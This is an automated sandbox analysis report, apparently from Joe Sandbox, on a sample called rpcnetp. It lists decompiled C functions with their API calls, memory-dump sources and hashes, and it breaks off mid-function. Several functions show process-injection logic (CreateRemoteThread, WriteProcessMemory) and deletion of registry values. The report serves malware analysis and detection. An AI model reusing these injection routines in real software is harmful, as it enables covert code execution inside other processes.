  • Opcode Fuzzy Hash: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
  • Instruction Fuzzy Hash: 04113075610744ABCB21AE7ACD84BC7BBFCEF84795B115819E95EE3212E734E8008A64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A116BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}











0x00a116be
0x00a116c1
0x00a116c9
0x00a116d2
0x00a116d8
0x00a116e0
0x00a116e3
0x00a116e9
0x00a116f7
0x00a116fa
0x00a116fa
0x00a116fc
0x00a11704
0x00a11707
0x00a11707
0x00a11709
0x00a11717
0x00a1171f
0x00a1172b
0x00a1172d
0x00a1172d
0x00a11734
0x00a1173c
0x00a1173f
0x00a1173f
0x00a11741
0x00a11749
0x00a1174c
0x00a1174c
0x00a11751
0x00000000
0x00a11758
0x00a1175b

APIs
  • EnterCriticalSection.KERNEL32(?), ref: 00A116E3
  • SetEvent.KERNEL32(?), ref: 00A116FA
  • SetEvent.KERNEL32(?), ref: 00A11707
  • WaitForSingleObject.KERNEL32(?,000007D0), ref: 00A1171F
  • CloseHandle.KERNEL32(?), ref: 00A1172B
  • CloseHandle.KERNEL32(?), ref: 00A1173F
  • CloseHandle.KERNEL32(?), ref: 00A1174C
  • DeleteCriticalSection.KERNEL32(?), ref: 00A11751
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
  • String ID:
  • API String ID: 2299618653-0
  • Opcode ID: 793d883e4e899669fe9bbacf2e7596f8678153195e8faccbd27405fd14b634f4
  • Instruction ID: cab75807c150e2e75d4836ca90c5957c47be791944fdb4ad262fa6cf47365af7
  • Opcode Fuzzy Hash: 793d883e4e899669fe9bbacf2e7596f8678153195e8faccbd27405fd14b634f4
  • Instruction Fuzzy Hash: 0F115279700744ABCB20EB75DC94AC7BBECAF08791B058819FA59D7250E734E881CEA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%
			E72B23161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x72b25430);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x72b260c4;
				 *0x72B26070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x72B26084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x72b26060);
				 *0x72b2600c = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				asm("sbb eax, eax");
				SetTimer( *0x72b2600c, 0x64, ( ~( *0x72b26038) & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x72b2600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E72B2159C(0, _t30);
			}






0x72b23161
0x72b23166
0x72b2316b
0x72b23172
0x72b2317d
0x72b23182
0x72b23192
0x72b23198
0x72b231a5
0x72b231ab
0x72b231b7
0x72b231c4
0x72b231d9
0x72b231df
0x72b231f4
0x72b231fe
0x72b231fe
0x72b23206
0x72b23215
0x72b23220

APIs
  • GetModuleFileNameA.KERNEL32(?,?,00000103,72B26060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 72B231A5
  • RegisterClassA.USER32 ref: 72B231AB
  • CreateWindowExA.USER32 ref: 72B231B1
  • SetTimer.USER32(00000064,?,00000000), ref: 72B231D9
  • GetMessageA.USER32 ref: 72B231E6
  • TranslateMessage.USER32(?), ref: 72B231F4
  • DispatchMessageA.USER32 ref: 72B231FE
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
  • String ID:
  • API String ID: 2359640614-0
  • Opcode ID: 26f157f04d120a53b1cbb107033abb21990728d417087b3eb5e107813db18389
  • Instruction ID: 29b8b4f74a95a23194c38b4f8543aa8665ab8fa1b511f83a033bb6963feef6d0
  • Opcode Fuzzy Hash: 26f157f04d120a53b1cbb107033abb21990728d417087b3eb5e107813db18389
  • Instruction Fuzzy Hash: 991160B2990314EFD7209F66CC89E6B7BFCFB95782B21491DB405D3182D7304944CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12);
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0x72b260c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}








0x72b222aa
0x72b222b1
0x72b222b9
0x72b222cf
0x72b222dd
0x72b222ed
0x72b222fd
0x72b22304
0x00000000
0x00000000
0x72b222e7
0x72b222e7
0x00000000
0x72b22311
0x72b22313

APIs
  • RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
  • RegDeleteValueA.ADVAPI32(?,?), ref: 72B222E7
  • RegEnumValueA.ADVAPI32 ref: 72B22300
  • RegCloseKey.ADVAPI32(?), ref: 72B22309
Strings
  • System\CurrentControlSet\Services\rpcnetp, xrefs: 72B222A0
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Value$CloseDeleteEnumOpenQuery
  • String ID: System\CurrentControlSet\Services\rpcnetp
  • API String ID: 1768883651-3077676073
  • Opcode ID: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction ID: a7eab7136433f130f13a6380ef9fab967bd967ebe69315b92658c948a71fe067
  • Opcode Fuzzy Hash: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
  • Instruction Fuzzy Hash: 9E010C76901218BBDB219A96CD48EDF7FBCEF452A1F101065FA05F2002D7319A45EBB4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E72B21F95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t84;
				signed int _t95;

				_t78 = __edx;
				_push(0x6c0);
				_push(0x72b253a8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x24)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E72B24D2D(_t84 - 0x3a0, 0, 0x32e);
				 *((short*)(_t84 - 0x398)) = 0x32a;
				E72B24D14(_t84 - 0x6d0, _t84 - 0x3a0, 0x32e);
				E72B24D44(_t84 - 0x70, _t84 - 0x6c8, _t84 - 0x398);
				 *((intOrPtr*)(_t84 - 0x3c)) = E72B25277;
				 *((intOrPtr*)(_t84 - 0x38)) = E72B25313;
				 *((intOrPtr*)(_t84 - 0x34)) = E72B2224A;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x30) = _t83;
				 *_t83 = 0x237;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x24)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E72B23223(E72B21C7B), _t83, 4, _t84 - 0x28);
					 *(_t84 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t84 + 8) = E72B21829;
				if( *((intOrPtr*)(_t83 + 0x6c)) == 4) {
					 *(_t84 + 8) = 0;
				}
				_t75 = _t83 + 0x1bc8;
				if(E72B21775(_t83, _t83 + 0x1bc8, 0, 2) == 0 || E72B21775(_t83, _t83 + 0x78,  *(_t84 + 8), 1) == 0) {
					L15:
					return E72B2159C(E72B24DC6(_t78, _t95, _t84 - 0x70), _t78);
				} else {
					 *(_t84 - 4) = 0;
					if( *((intOrPtr*)(_t84 - 0x24)) == 0) {
						E72B22429(_t75, 0);
					}
					if( *(_t84 - 0x1c) == 0) {
						do {
							_push(_t84 - 0x70);
							__eflags = E72B21D27(_t75, _t78, 0, _t83, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t84 - 0x1c));
						WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t84 - 0x1c));
						L14:
						_t42 = _t84 - 4;
						 *_t42 =  *(_t84 - 4) | 0xffffffff;
						_t95 =  *_t42;
						goto L15;
					}
				}
			}








0x72b21f95
0x72b21f95
0x72b21f9a
0x72b21f9f
0x72b21fa6
0x72b21fa9
0x72b21fac
0x72b21fb9
0x72b21fca
0x72b21fd2
0x72b21fe8
0x72b21fff
0x72b22004
0x72b2200b
0x72b22012
0x72b22019
0x72b2201c
0x72b2201f
0x72b22025
0x72b2202f
0x72b2203a
0x72b22041
0x72b2205f
0x72b22065
0x72b2206a
0x72b2206c
0x72b2206c
0x72b2206a
0x72b22073
0x72b2207e
0x72b22080
0x72b22080
0x72b22083
0x72b22095
0x72b220fb
0x72b22109
0x72b220aa
0x72b220aa
0x72b220b0
0x72b220b4
0x72b220b4
0x72b220bc
0x72b220e1
0x72b220e4
0x72b220ea
0x72b220ea
0x00000000
0x72b220be
0x72b220c1
0x72b220d0
0x72b220d9
0x72b220f7
0x72b220f7
0x72b220f7
0x72b220f7
0x00000000
0x72b220f7
0x72b220bc

APIs
  • GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21C37,?), ref: 72B21FB7
    • Part of subcall function 72B24D44: GetVersion.KERNEL32(?,72B26150,00000034,0000032E,?,72B22004,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B24D61
  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
  • ResumeThread.KERNEL32(?), ref: 72B220C1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
  • CloseHandle.KERNEL32(?), ref: 72B220D9
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
  • String ID:
  • API String ID: 3869061129-0
  • Opcode ID: 11a120d3f7cb7f11abcc42cdc696da354dd517c25bf4f2de8dc470e5de7004bf
  • Instruction ID: 355344fad5c52479a02bf13cfb35cb00ff9462887997cb78211b3fa50bd0aa08
  • Opcode Fuzzy Hash: 11a120d3f7cb7f11abcc42cdc696da354dd517c25bf4f2de8dc470e5de7004bf
  • Instruction Fuzzy Hash: A4418BB1C00318ABDF21CFA9CC84EDFBAF8EF84351F10461AE55AA6091E7745A41CF64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
			E00A11F95(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t72;
				void* _t82;
				void* _t83;
				signed int _t94;

				_push(0x6c0);
				_push(0xa153a8);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t83 - 0x20) = 0;
				 *(_t83 - 0x1c) = 0;
				 *((intOrPtr*)(_t83 - 0x24)) = 0;
				 *(_t83 - 0x20) = GetStdHandle(0xfffffff4);
				E00A14D2D(_t83 - 0x3a0, 0, 0x32e);
				 *((short*)(_t83 - 0x398)) = 0x32a;
				E00A14D14(_t83 - 0x6d0, _t83 - 0x3a0, 0x32e);
				E00A14D44(_t83 - 0x70, _t83 - 0x6c8, _t83 - 0x398);
				 *((intOrPtr*)(_t83 - 0x3c)) = E00A15277;
				 *((intOrPtr*)(_t83 - 0x38)) = E00A15313;
				 *((intOrPtr*)(_t83 - 0x34)) = E00A1224A;
				_t82 =  *(_t83 + 8);
				 *(_t83 - 0x30) = _t82;
				 *_t82 = 0x237;
				 *((intOrPtr*)(_t82 + 4)) = 6;
				if( *(_t83 - 0x20) != 0 &&  *(_t83 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t83 - 0x24)) = 1;
					 *(_t82 + 0x1bbc) =  *(_t82 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t83 - 0x20), 0, 0, E00A13223(E00A11C7B), _t82, 4, _t83 - 0x28);
					 *(_t83 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t82 + 0x1bbc) =  *(_t82 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t83 + 8) = E00A11829;
				if( *((intOrPtr*)(_t82 + 0x6c)) == 4) {
					 *(_t83 + 8) = 0;
				}
				_t75 = _t82 + 0x1bc8;
				if(E00A11775(_t82, _t82 + 0x1bc8, 0, 2) == 0 || E00A11775(_t82, _t82 + 0x78,  *(_t83 + 8), 1) == 0) {
					L15:
					return E00A1159C(E00A14DC6(_t94, _t83 - 0x70));
				} else {
					 *(_t83 - 4) = 0;
					if( *((intOrPtr*)(_t83 - 0x24)) == 0) {
						E00A12429(_t75, 0);
					}
					if( *(_t83 - 0x1c) == 0) {
						do {
							_push(_t83 - 0x70);
							__eflags = E00A11D27(_t75, 0, _t82, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t83 - 0x1c));
						WaitForMultipleObjects(2, _t83 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t83 - 0x1c));
						L14:
						_t42 = _t83 - 4;
						 *_t42 =  *(_t83 - 4) | 0xffffffff;
						_t94 =  *_t42;
						goto L15;
					}
				}
			}







0x00a11f95
0x00a11f9a
0x00a11f9f
0x00a11fa6
0x00a11fa9
0x00a11fac
0x00a11fb9
0x00a11fca
0x00a11fd2
0x00a11fe8
0x00a11fff
0x00a12004
0x00a1200b
0x00a12012
0x00a12019
0x00a1201c
0x00a1201f
0x00a12025
0x00a1202f
0x00a1203a
0x00a12041
0x00a1205f
0x00a12065
0x00a1206a
0x00a1206c
0x00a1206c
0x00a1206a
0x00a12073
0x00a1207e
0x00a12080
0x00a12080
0x00a12083
0x00a12095
0x00a120fb
0x00a12109
0x00a120aa
0x00a120aa
0x00a120b0
0x00a120b4
0x00a120b4
0x00a120bc
0x00a120e1
0x00a120e4
0x00a120ea
0x00a120ea
0x00000000
0x00a120be
0x00a120c1
0x00a120d0
0x00a120d9
0x00a120f7
0x00a120f7
0x00a120f7
0x00a120f7
0x00000000
0x00a120f7
0x00a120bc

APIs
  • GetStdHandle.KERNEL32(000000F4,00A153A8,000006C0,00A11C37,?), ref: 00A11FB7
    • Part of subcall function 00A14D44: GetVersion.KERNEL32(?,00A16150,00000034,0000032E,?,00A12004,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A14D61
  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,?,0000032E,?,00000000,0000032E), ref: 00A12033
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 00A1205F
  • ResumeThread.KERNEL32(?), ref: 00A120C1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A120D0
  • CloseHandle.KERNEL32(?), ref: 00A120D9
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
  • String ID:
  • API String ID: 3869061129-0
  • Opcode ID: f54de70cf94d1d0c6bec5a6e01abc851b10e3f7ee939da76f352086237842c53
  • Instruction ID: 277028db6a4a490f77cbeaa80d0e5255b9867b1d02e9fb5080022b90e3ebbaa6
  • Opcode Fuzzy Hash: f54de70cf94d1d0c6bec5a6e01abc851b10e3f7ee939da76f352086237842c53
  • Instruction Fuzzy Hash: 5A4159B1C00618AADF21DFA4DD45EEEBBBCBF49350F10421AF695A6190D7749AC1CF60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				intOrPtr _t53;
				void* _t56;

				E72B24D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E72B22D40( &_v144);
						return PostMessageA( *0x72b2600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					if( *0x72b260ce != 0) {
						_t53 = 0x72b260ce;
					}
					if(E72B22D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))) > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E72B24D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E72B21C2C, _t56, 0,  &_v16);
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1);
					}
				}
				E72B21F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}













0x72b23015
0x72b2301a
0x72b23021
0x72b23021
0x72b23021
0x72b23027
0x72b23028
0x72b2302b
0x00000000
0x00000000
0x72b2302e
0x72b2310a
0x72b23111
0x72b2312f
0x72b2312f
0x72b23034
0x72b23039
0x72b23039
0x72b23042
0x72b23044
0x72b23044
0x72b2305f
0x72b2307a
0x00000000
0x00000000
0x72b2307c
0x00000000
0x72b2305f
0x72b2308e
0x72b23092
0x72b23094
0x72b23098
0x72b230a2
0x72b230b0
0x72b230b7
0x72b230c9
0x72b230d0
0x72b230d6
0x72b230de
0x72b230e2
0x72b230eb
0x72b230f2
0x72b230f2
0x72b230de
0x72b230fc
0x72b23104
0x00000000
0x00000000
0x00000000
0x00000000

APIs
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 72B23072
  • LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 72B23088
  • GetCurrentThreadId.KERNEL32 ref: 72B2309C
  • CreateThread.KERNEL32(00000000,00000000,Function_00001C2C,00000000,00000000,?), ref: 72B230D0
  • SetThreadPriority.KERNEL32(?,000000F1), ref: 72B230F2
  • PostMessageA.USER32 ref: 72B23125
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
  • String ID:
  • API String ID: 2250156434-0
  • Opcode ID: a27942b64084d6f373f2d952d1f4d1d09f7ca68c105ca6b079fd26903a4ef7d8
  • Instruction ID: 600c3e933443d6e78f6ca0bd9c7fa0cb8a0584d99d1a0196c81ce118fa489354
  • Opcode Fuzzy Hash: a27942b64084d6f373f2d952d1f4d1d09f7ca68c105ca6b079fd26903a4ef7d8
  • Instruction Fuzzy Hash: 1A316171900704BFDB219BA9CC49FCBBBFCEB84746F104559F65AE6181E7709A48CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A12FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				intOrPtr _t53;
				void* _t56;

				E00A14D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E00A12D40( &_v144);
						return PostMessageA( *0xa1600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					if( *0xa160ce != 0) {
						_t53 = 0xa160ce;
					}
					if(E00A12D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))) > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E00A14D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E00A11C2C, _t56, 0,  &_v16);
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1);
					}
				}
				E00A11F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}













0x00a13015
0x00a1301a
0x00a13021
0x00a13021
0x00a13021
0x00a13027
0x00a13028
0x00a1302b
0x00000000
0x00000000
0x00a1302e
0x00a1310a
0x00a13111
0x00a1312f
0x00a1312f
0x00a13034
0x00a13039
0x00a13039
0x00a13042
0x00a13044
0x00a13044
0x00a1305f
0x00a1307a
0x00000000
0x00000000
0x00a1307c
0x00000000
0x00a1305f
0x00a1308e
0x00a13092
0x00a13094
0x00a13098
0x00a130a2
0x00a130b0
0x00a130b7
0x00a130c9
0x00a130d0
0x00a130d6
0x00a130de
0x00a130e2
0x00a130eb
0x00a130f2
0x00a130f2
0x00a130de
0x00a130fc
0x00a13104
0x00000000
0x00000000
0x00000000
0x00000000

APIs
  • PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 00A13072
  • LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 00A13088
  • GetCurrentThreadId.KERNEL32 ref: 00A1309C
  • CreateThread.KERNEL32(00000000,00000000,Function_00001C2C,00000000,00000000,?), ref: 00A130D0
  • SetThreadPriority.KERNEL32(?,000000F1), ref: 00A130F2
  • PostMessageA.USER32 ref: 00A13125
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
  • String ID:
  • API String ID: 2250156434-0
  • Opcode ID: d7cbe5c6dad7131069d06c2b4e33eec105a11d0ab6a226dbf8cc942ba869b434
  • Instruction ID: 1d5784b7827291de9282786491dfc428f6b6a746be1b0c3c5dfc98a212d99876
  • Opcode Fuzzy Hash: d7cbe5c6dad7131069d06c2b4e33eec105a11d0ab6a226dbf8cc942ba869b434
  • Instruction Fuzzy Hash: 0831AA72900608BFDF21DFA5DC49FDABBBCEB48700F10825AF655E6181D7749A85CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E72B21C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x72b25398);
				E72B24A94(_t40, _t44, _t46);
				 *(_t48 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t45 = GetStdHandle(0xfffffff4);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *(_t48 - 0x1c) != 0) {
					_push(_t48 - 0x20);
					_t41 = 4;
					_t47 =  *(_t48 + 8);
					if(WriteProcessMemory(_t45, _t47 + 0x84, _t48 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t45, _t47,  *(_t48 - 0x1c), 0x78, _t48 - 0x20) != 0) {
						 *( *(_t48 - 0x1c) + 0x6c) = _t41;
						 *( *(_t48 - 0x1c) + 0x70) =  *( *(_t48 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t48 - 0x1c) + 0x370c) =  *( *(_t48 - 0x1c) + 0x370c) | _t41;
						 *( *(_t48 - 0x1c) + 0x1bd4) = _t47;
						E72B21F95(_t41, _t42, _t43, _t45, _t47,  *( *(_t48 - 0x1c) + 0x370c),  *(_t48 - 0x1c));
					}
					LocalFree( *(_t48 - 0x1c));
				}
				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
